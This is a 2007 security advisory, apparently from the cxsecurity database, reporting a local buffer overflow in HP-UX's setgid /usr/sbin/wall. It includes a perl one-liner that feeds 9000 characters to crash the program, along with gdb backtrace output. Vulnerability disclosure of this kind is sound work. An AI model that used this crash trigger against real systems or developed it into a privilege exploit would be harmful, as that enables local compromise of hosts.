HPUX Wall Buffer Overflow

2007.10.21
Credit: Scotty
Risk: High
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Hi all, after looking to check if this had been reported before I couldn't find anything, so here's my two cents: HPUX /usr/sbin/wall Buffer Overflow. bash-2.04$ ls -las /usr/sbin/wall 40 -r-xr-sr-x 1 bin tty 20480 Nov 7 1997 /usr/sbin/wall Wall on HPUX works in the following way: echo "Something to Say" > file wall file The problem arises when we place 9000 A's into the file to be broadcast by the wall program. (Tested on HPUX 11.11) perl -e 'print "A" x 9000' > /tmp/out /usr/sbin/wall /tmp/out Memory fault (Tested on HPUX 11.00) perl -e 'print "A" x 9000' > /tmp/out /usr/sbin/wall /tmp/out bash-2.04$ /usr/sbin/wall /tmp/out Segmentation fault Looking at the registers, we can see: Program received signal SIGSEGV, Segmentation fault. 0x7f779c08 in strcat () from /usr/lib/libc.2 (gdb) bt 7f779c08 in strcat () from /usr/lib/libc.2 #1 0x34dc in ?? () #2 0x34dc in ?? () #3 0x34dc in ?? () #4 0x34dc in ?? () Error accessing memory address 0xffffffff: Bad address. etc.. etc The wall binary has Set Group ID of tty, so not a huge problem, but even so - still a security risk. Regards, uk2sec Memebers; eip, c0w uk2sec (at) oakey.no-ip (dot) com [email concealed]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top